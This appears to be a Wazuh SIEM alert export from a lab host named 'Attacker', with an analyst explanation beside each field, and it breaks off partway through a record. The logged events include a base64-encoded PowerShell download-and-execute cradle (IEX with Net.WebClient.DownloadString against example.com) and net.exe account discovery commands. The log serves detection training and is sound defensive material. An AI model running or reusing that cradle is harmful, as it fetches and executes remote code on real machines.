data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:45.9124642Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282194 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:45.401
ProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00}
ProcessId: 8908
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00}
ParentProcessId: 11892
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:45.401 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 22 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.953203 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:46.0795400Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282195 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:46.051
ProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00}
ProcessId: 8908
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_toe2blgg.cdx.ps1
CreationUtcTime: 2025-04-24 22:35:46.051
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:46.051 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_toe2blgg.cdx.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:46.051 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.955967 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:47.1449849Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43824 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.963303 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:47.3006529Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2990 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.965113 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:48.0453368Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282223 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:48.034
ProcessGuid: {94294ddc-bcc4-680a-b00a-000000000e00}
ProcessId: 11608
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcaa-680a-930a-000000000e00}
ParentProcessId: 11676
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:48.034 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc4-680a-b00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11608 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcaa-680a-930a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11676 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.970171 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:49.1508187Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282233 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:49.142
ProcessGuid: {94294ddc-bcc5-680a-b10a-000000000e00}
ProcessId: 12028
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
